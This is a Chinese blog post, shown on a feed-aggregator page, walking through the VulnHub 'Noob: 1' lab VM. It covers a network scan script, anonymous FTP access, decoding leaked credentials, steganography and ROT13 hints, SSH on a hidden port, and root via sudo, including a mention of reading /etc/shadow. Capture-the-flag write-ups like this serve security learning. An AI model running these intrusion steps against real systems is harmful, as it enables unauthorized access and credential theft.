惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Attack and Defense Labs
Attack and Defense Labs
酷 壳 – CoolShell
酷 壳 – CoolShell
博客园_首页
博客园 - 司徒正美
月光博客
月光博客
Apple Machine Learning Research
Apple Machine Learning Research
T
Tailwind CSS Blog
Jina AI
Jina AI
GbyAI
GbyAI
Y
Y Combinator Blog
罗磊的独立博客
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
P
Proofpoint News Feed
Last Week in AI
Last Week in AI
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
量子位
雷峰网
雷峰网
博客园 - 【当耐特】
H
Hackread – Cybersecurity News, Data Breaches, AI and More
The GitHub Blog
The GitHub Blog
S
Secure Thoughts
博客园 - 三生石上(FineUI控件)
Cyberwarzone
Cyberwarzone
NISL@THU
NISL@THU
J
Java Code Geeks
C
Cisco Blogs
人人都是产品经理
人人都是产品经理
Webroot Blog
Webroot Blog
腾讯CDC
博客园 - 叶小钗
C
Cyber Attacks, Cyber Crime and Cyber Security
T
Troy Hunt's Blog
AI
AI
L
LangChain Blog
Know Your Adversary
Know Your Adversary
T
Tenable Blog
M
MIT News - Artificial intelligence
P
Privacy & Cybersecurity Law Blog
L
LINUX DO - 最新话题
Hugging Face - Blog
Hugging Face - Blog
F
Full Disclosure
P
Proofpoint News Feed
AWS News Blog
AWS News Blog
有赞技术团队
有赞技术团队
A
Arctic Wolf
Security Archives - TechRepublic
Security Archives - TechRepublic
S
Schneier on Security
Recent Commits to openclaw:main
Recent Commits to openclaw:main
W
WeLiveSecurity
The Cloudflare Blog

博客园_首页

Plist 二进制格式 Milvus 和 PGVector,哪个更好? OpenClaw 已过时?在 VS Code 中运行 Hermes Agent! 第30篇文章:一个大三计科生的自白 Manim如何在数学公式中完美显示中文? Docker 部署 RocketMQ 5 并发编程核心概念辨析 C#事务处理最佳实践:别再让“主表存了、明细丢了”的破事发生 CLI 是什么?为什么大厂突然集体卷命令行? 【从0到1构建一个ClaudeAgent】协作-自主Agent UIImageView 设置图片不生效的原因排查 最小二乘问题详解20:无先验约束下的增量式SFM自由网平差 痞子衡嵌入式:大话双核i.MXRT1180之XIP应用里借助MU实现可靠Flash IAP的方法 AI Chat 封装, SemanticKerne.AiProvider.Unified 已发布 Windows下右键编辑js文件无法打开记事本——在注册表中使用环境变量 在后台服务中使用 Scoped 服务,为什么总是报错? H200 安装驱动并使用sglang启动模型 wireshark 抓包Trap上报告警内容 我用 AI 辅助开发了一系列小工具(2):图片压缩工具 [A Primer On MC and CC] 2.1 Memory Consistency 1 - 指令重排序和 SC 模型 Oracle数据库SCN推进技术详解与实践指南 玩转控件:封装个带图片的Label控件 Claude Code 4.7 真正该升级的不是模型,而是你的工作流 前端小白一句话,AI 帮我做了个颜值拉满的桌面媒体播放器。当代码不再是门槛,一句话编程就是现实。 5. WorkBuddy: 小龙虾的灵魂三件套,让你的小龙虾不只是工具 SQLite 分片方案实战:三种分片策略的深度对比 告别简陋 UI!一款基于 Fluent Design 和基于 WinUI 的开源免费、现代化的 Avalonia UI 控件库 关于二进制排列组合枚举的总结 AI开发-python-LangGraph框架(3-27-LangGraph从零实现大模型智能决策工作流) ElasticSearch主分片和副本分片概念详解 【002】HTTPS 粗解:证书、TLS 握手与对后端配置的影响 Hermes Agent 一周暴涨五万 Star,但我劝你别急着追 明明连接的是Redis的DB0,为什么能查到DB3的数据? 【从0到1构建一个ClaudeAgent】协作-Agent团队 熟悉电子元器件之后,电子小白下一步该怎么走? MAF快速入门(23)通过C#类定义Skills .NET 高级开发 | 手写一个对象映射框架 FastAPI数据库ORM怎么选?我肝了三个Demo后,终于不再纠结了 mysqldump 参数拾遗:在遗忘与铭记之间 C# .NET 周刊|2026年3月5期 Claude code入门 - 陈彦斌 一文学习入门 ThingsBoard 开源物联网平台 GitHub 热门项目 | 2026年04月16日 如何为GIT设置全局勾子,为每次提交追加信息 Number.isFinite和isFinite与isNaN()和Number.isNaN的区别 PortSwigger SQL注入LAB2 推荐一个测试人必备的Skills,从功能到性能全搞定(附详细实操和安装下载方式) 筑基期:掌握Odoo基础核心知识点02(Odoo XML 开发方式详解) GLM模型这么火,咱们用vllm也咧一个呗! 深入理解 AbortController:从底层原理到跨语言设计哲学 字符串学习笔记 多租户系统框架的基础模块设计和分析设计 Apache SeaTunnel Zeta 为什么能做到“又快又稳”? AI开发-python-LangGraph框架(3-26-LangGraph基本概念及第一个简单样例) Vue 3 组件通信,别只会用 Props 和 Emits 了,这几个狠活儿你得看看 ElasticSearch7.X版本配置密码 用Manim实现动态交点计算--从一个动点问题说起 团结引擎+Addressable+Instant Game打包抖音小游戏 function call 实战:让 LLM 自动判断 pod 异常、调用日志工具并完成故障分析 bubseek —— 让 Agent 的足迹,变成团队的洞察 通过 C# 读取并导出 PDF 书签 如何用 GitHub Actions 实现 Steam 自动化发布 【从0到1构建一个ClaudeAgent】并发-后台任务 .NET 高级开发 | 定制 ASP.NET Core 框架 电子小白:什么是运算放大器(运放) zero2Agent:面向大厂面试的 Agent 工程教程,从概念到生产的完整学习路线 堆上的ORW HC32F460 USB CDC通信异常:非对齐访问异常排查 20260413-Hyperbridge 攻击事件:发生在默克尔山上的验证绕过 那些喊着AI 要淘汰你的人,正在靠你的焦虑赚大钱! 深度学习进阶(八)Swin Transformer 最小二乘问题详解19:带先验约束的增量式SFM优化与实现 SnapTranslate 3.0 正式发布:全局划词翻译 + 完整英语学习闭环,一站式搞定查词、记词、复习 工作的意义、工作的困难认知再思考 .NET + AI 进阶实战:基于类的技能开发 - 打造可治理的 Agent 能力模块 【从0到1构建一个ClaudeAgent】规划与协调-技能 上周热点回顾(4.6-4.12) 电子小白的工具三件套:面包板、杜邦线、万能板 单表五亿数据的查询优化 | Mysql、StarRocks 2. WorkBuddy:从“我是谁”到“帮我干活” C# 如何减少代码运行时间:7 个实战技巧 基于HelixToolkit.SharpDX 渲染3D模型 - 笺上知微 从零开始的双臂具身VLA起源及现阶段发展综述 - SkyXZ 记对 xonsh shell 的使用, 脚本编写, 迁移及调优 - pluvium27 受够了Vibe Coding的失控?换个起点,让AI事半功倍 从开始配置漏洞环境到漏洞复现流程 - 難しい 关于10年工作经验的程序员对OpenClaw的实战经验分享以及看法 - 虚无境 Any metadata 的内存布局 C# .NET 周刊|2026年3月2期 - InCerry 我帮你测过了,测试圈排名第二的 Skill 依然很牛逼 Skill Discovery | 无监督技能发现的经典工作总结 - MoonOut 上下文工程是什么?过时了么?一文讲明白! - 一枫说码 开了 TUN 模式还是直连?90% 的人都踩过这个坑 AScript扩展多种脚本语言 - rockey627 AI 学习笔记:Agent 的记忆机制 你能被装进一个文件里吗?——7 万人把同事"蒸馏"成了 AI - 我没有三颗心脏 Claude Code 通关手册(七):给 AI 装上技能包——Skills 完全指南 - 暮色之狐 在浏览器中快速编辑代码:VSCode Web 集成实践 - Newbe36524 蒸馏自己 skill?基于 Deepseek 的蒸馏器,丐版蒸馏方式,简单便捷 - To_Carpe_Diem Spring AI Aliababa和AgentScope,哪个更好? - 苏三说技术
vulnhub:Noob: 1(拿下的第一台靶机)
柯柯(超喜欢山田凉) · 2026-05-17 · via 博客园_首页

一、寻找目标主机(信息收集)

因为目标主机和我们在同一个网段,我们可以扫描一一下我们的网卡

首先使用 ipconfig -a 来查看我们的网卡信息

扫描是什么?

扫描一个网段下所有机器的IP和常用端口,比如:

  • 192.168.1.1,路由器开着80、443
  • 192.168.1.100你的电脑,开着22
  • 192.168.1.101不认识的设备,开着3389

是“横向”扫一台机器,而不是“纵向”扫一台机器的全部端口。


为什么需要比较?

因为单次扫描只是一张快照,看不出变化。对比两天的结果才能发现:

发现的异常 意味着什么
突然多了一台新设备 有人私接设备,或有入侵者
某台机器突然打开新端口 可能被入口后门、木马
某台机器消失了 设备下线或被攻击瘫痪

扫描脚本:

#!/bin/bash

SCRIPT_DIR=$(dirname "$(realpath "$0")")

# 获取本机信息
IFACE=$(ip route | awk '/default/ {print $5}' | head -1)
LOCAL_IP=$(ip -4 addr show "$IFACE" | awk '/inet / {print $2}' | cut -d'/' -f1)
SUBNET=$(echo "$LOCAL_IP" | cut -d'.' -f1-3)".0/24"

SCAN_DIR=~/nmap_diff
mkdir -p "$SCAN_DIR"

d=$(date +%Y-%m-%d)
y=$(date -d yesterday +%Y-%m-%d)

echo ""
echo "正在扫描网段: $SUBNET ..."
echo ""

/usr/bin/nmap -T4 -oX "$SCAN_DIR/scan_$d.xml" "$SUBNET" >/dev/null 2>&1

parse_host() {
    local xml="$1"
    python3 - "$xml" <<'EOF'
import sys
import xml.etree.ElementTree as ET

tree = ET.parse(sys.argv[1])
root = tree.getroot()

hosts = []
for host in root.findall('host'):
    status = host.find('status')
    if status is None or status.get('state') != 'up':
        continue
    addr_el = host.find('address')
    if addr_el is None:
        continue
    addr = addr_el.get('addr')
    ports = []
    ports_el = host.find('ports')
    if ports_el is not None:
        for port in ports_el.findall('port'):
            state_el = port.find('state')
            if state_el is not None and state_el.get('state') == 'open':
                ports.append(port.get('portid'))
    hosts.append((addr, ports))

for addr, ports in hosts:
    port_str = ', '.join(ports) if ports else '无开放端口'
    print(f"{addr}|{port_str}")
EOF
}

RESULTS=$(parse_host "$SCAN_DIR/scan_$d.xml")

echo "=================================================="
printf "%-18s %s\n" "IP地址" "开放端口"
echo "=================================================="

echo ""
echo "【本机】"
echo "--------------------------------------------------"
while IFS='|' read -r ip ports; do
    if [ "$ip" = "$LOCAL_IP" ]; then
        printf "%-18s %s\n" "$ip" "$ports"
    fi
done <<< "$RESULTS"

echo ""
echo "【其他机器】"
echo "--------------------------------------------------"
while IFS='|' read -r ip ports; do
    if [ "$ip" != "$LOCAL_IP" ]; then
        printf "%-18s %s\n" "$ip" "$ports"
    fi
done <<< "$RESULTS"

echo "=================================================="
echo ""

if [ -e "$SCAN_DIR/scan_$y.xml" ]; then
    /usr/bin/ndiff "$SCAN_DIR/scan_$y.xml" "$SCAN_DIR/scan_$d.xml" > "$SCRIPT_DIR/diff.txt"
    echo "[变动记录已保存到 $SCRIPT_DIR/diff.txt]"
    echo ""
fi

结果

┌──(kali㉿kali)-[~/桌面]
└─$ ./nampsm.sh  

正在扫描网段: 192.168.75.0/24 ...

==================================================
IP地址           开放端口
==================================================

【本机】
--------------------------------------------------
192.168.75.*    22

【其他机器】
--------------------------------------------------
192.168.75.1       135, 2179, 3306
192.168.75.2       53
192.168.75.254     无开放端口
==================================================

192.168.75.1 — VMware 虚拟带宽(占用机)

端口 作用
135 Windows RPC
2179 Hyper-V虚拟机连接(你一台机器安装了Hyper-V 或 VMware)
3306 MySQL,你一台机器上安装了数据库

就是你运行VMware的那台Windows物理机


192.168.75.2 — VMware DNS/DHCP 服务

端口 作用
53 DNS解析

VMware自动创建的虚拟服务,负责给虚拟机分配IP和解析域名,不是真实的机器


192.168.75.254 — VMware NAT 网关

负责把虚拟机的流量转发到外网,虚拟路由器,也不是真实的机器

21 FTP 文件传输服务,可能存在匿名登录、弱密码
80 HTTP 跑着一个网站,可能存在Web漏洞

# 看看网站是什么
curl http://192.168.75.*

# 试试 FTP 匿名登录
ftp 192.168.75.*
# 用户名输 anonymous,密码直接回车


ftp 192.168.75.*
# 用户名: anonymous
# 密码: 直接回车
Connected to 192.168.75.*.
220 (vsFTPd 3.0.3)
Name (192.168.75.*:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||15579|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              21 Sep 21  2021 cred.txt
-rw-r--r--    1 0        0              86 Jun 11  2021 welcome
226 Directory send OK.
ftp> cat cred.txt
?Invalid command.
ftp> cat welcome
?Invalid command.
ftp> 





为什么ftp没有cat

FTP 是文件传输协议,不是 Shell,它只能进行文件操作,不能执行命令。


可能到这里会有疑问cat vim不也是对文件操作吗

好问题,区别在于哪里执行、执行的是什么。
cat/vim是程序,需要操作系统来运行:
你输入 cat → Linux内核 → 读文件内容 → 输出到终端
FTP 是网络协议,只定义了几条固定指令:
你输入 get → FTP服务 → 把文件传过来
FTP服务收到cat这两个字母,它不知道该做什么,因为协议里根本没有定义这条指令。


有两个文件

一个是提示,还有一个是网站的账户密码


┌──(kali㉿kali)-[~/桌面]
└─$ cat cred.txt              
Y2hhbXA6cGFzc3dvcmQ=
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/桌面]
└─$ cat welcome       
                        🙏 WELCOME 🙏

                  We're glad to see you here.

                      💪 All The Best 👍
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/桌面]
└─$ echo "Y2hhbXA6cGFzc3dvcmQ=" | base64 -d
champ:password      

 http://192.168.75.* 登录 champ:password 

然后网站上有下载附件(一个压缩包)
downloads:funny.bmp,funny.jpg,sudo



┌──(kali㉿kali)-[~/下载/downloads]
└─$ file sudo        # 看是什么类型的文件
cat sudo         # 如果是文本就直接看内容
sudo: ASCII text
Did you notice the file name? Isn't is interesting?
你注意到文件名了吗?是不是很有趣?
这个提示后面有用
                                                                                                                                                                                             
┌──(kali㉿kali)-[~/下载/downloads]
└─$ # 安装 steghide
sudo apt install steghide


测图片隐写

┌──(kali㉿kali)-[~/下载/downloads]
└─$ steghide extract -sf funny.jpg

Enter passphrase: 
wrote extracted data to "hint.py".   这个是空密码

hint.py:

This is_not a python file but you are revolving around.
well, try_ to rotate some words too.


提示rot13



┌──(kali㉿kali)-[~/下载/downloads]
└─$  steghide extract -sf funny.bmp
Enter passphrase: 
wrote extracted data to "user.txt".  这个是sudo “你注意到文件名了吗?是不是很有趣?”

jgs:guvf bar vf n fvzcyr bar  使用rot13解一下



┌──(kali㉿kali)-[~/下载/downloads]
└─$ echo "jgs:guvf bar vf n fvzcyr bar" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
wtf:this one is a simple one

到了这里就卡住了,拿到了wtf:this one is a simple one但是没有了利用点

回到开头 我们是拿脚本扫描的(脚本只扫常用端口(nmap 默认扫1000个常用端口),不扫全部 65535 个端口)
所以还是不要偷懒,尽量使用工具
┌──(kali㉿kali)-[~/桌面]
└─$ ./nampsm.sh

正在扫描网段: 192.168.75.0/24 ...

==================================================
IP地址           开放端口
==================================================

【本机】
--------------------------------------------------
192.168.75.*    22

【其他机器】
--------------------------------------------------
192.168.75.1       135, 2179, 3306
192.168.75.2       53
192.168.75.*     21, 80
192.168.75.254     无开放端口
==================================================









RustScan是用Rust编写的高速端口扫描工具,比传统的Nmap快速扫描。

rustscan -a 192.168.75.*

安装 rustscan

wget https://github.com/RustScan/RustScan/releases/download/2.3.0/rustscan_2.3.0_amd64.deb
sudo dpkg -i rustscan_2.3.0_amd64.deb

-a 192.168.75.*  -a即-addresses,指定要扫描的目标IP地址


──(kali㉿kali)-[~/桌面]
└─$ rustscan -a 192.168.75.*


PORT      STATE SERVICE REASON
21/tcp    open  ftp     syn-ack ttl 64
80/tcp    open  http    syn-ack ttl 64
55077/tcp open  unknown syn-ack ttl 64
MAC Address: 00:0C:29:5B:0D:51 (VMware)



通过namp 确定他是什么服务:


──(kali㉿kali)-[~/桌面]
└─$ nmap -sV -p 55077 192.168.75.*
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-16 23:45 CST
Nmap scan report for 192.168.75.*
Host is up (0.00067s latency).

PORT      STATE SERVICE VERSION
55077/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:5B:0D:51 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds


ssh


sudo -l
查当前用户的权

wtf@wtf:~$ sudo -l
[sudo] password for wtf: 
Matching Defaults entries for wtf on wtf:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wtf may run the following commands on wtf:
    (ALL : ALL) ALL
wtf@wtf:~$ sudo su
root@wtf:/home/wtf# cat /root/root.txt
RW5kb3JzZSBtZSBvbiBsaW5rZWRpbiA9PiBodHRwczovL3d3dy5saW5rZWRpbi5jb20vaW4vZGVlcGFrLWFoZWVyCg==




whoami = who am i(我是谁)
就是显示当前登录的用户名


cat /etc/shadow 能读到内容也说明是 root,因为普通用户没权限读这个文件


普通用户 flag  →  /home/用户名/user.txt
root flag     →  /root/root.txt


image-20260516235739306

继续加油!